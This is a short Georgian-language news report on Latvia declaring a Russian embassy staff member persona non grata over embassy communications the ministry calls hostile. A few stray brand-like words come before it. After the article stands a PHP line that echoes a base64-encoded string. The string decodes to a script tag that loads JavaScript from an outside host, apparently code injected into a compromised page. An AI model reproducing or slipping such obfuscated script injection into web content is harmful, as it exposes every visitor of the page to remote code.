celsiusi
ავერსი საქკაბელი

 ლატვიის საგარეო საქმეთა სამინისტრომ რუსეთის ელჩი პერსონა ნონ გრატად გამოაცხადა.

ინფორმაციას ამის შესახებ საგარეო უწყება ავრცელებს.

ლატვიის საგარეო საქმეთა სამინისტროს განცხადებაში აღნიშნულია, რომ საელჩოს თანამშრომელმა ქვეყანა 10 აპრილამდე უნდა დატოვოს.

„2024 წლის 27 მარტს რუსეთის საელჩოს საქმეთა დროებითი რწმუნებული ლატვიის საგარეო საქმეთა სამინისტროში დაიბარეს. რუსეთის საელჩო, ლატვიის საგარეო საქმეთა სამინისტროს მკაცრი გაფრთხილებების მიუხედავად, აგრძელებს არაკორექტულ საჯარო კომუნიკაციას, რომელიც მიზნად ისახავს ლატვიის სახელმწიფოს საჯარო ინსტიტუტებისა და ხელისუფლების დისკრედიტაციას, ასევე ლატვიაში საზოგადოებაში სიძულვილის გაღვივებას. ეს მკაცრად ეწინააღმდეგება დიპლომატიური ურთიერთობების შესახებ ვენის 1961 კონვენციის სულისკვეთებას“, – ნათქვამია განცხადებაში.

226
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");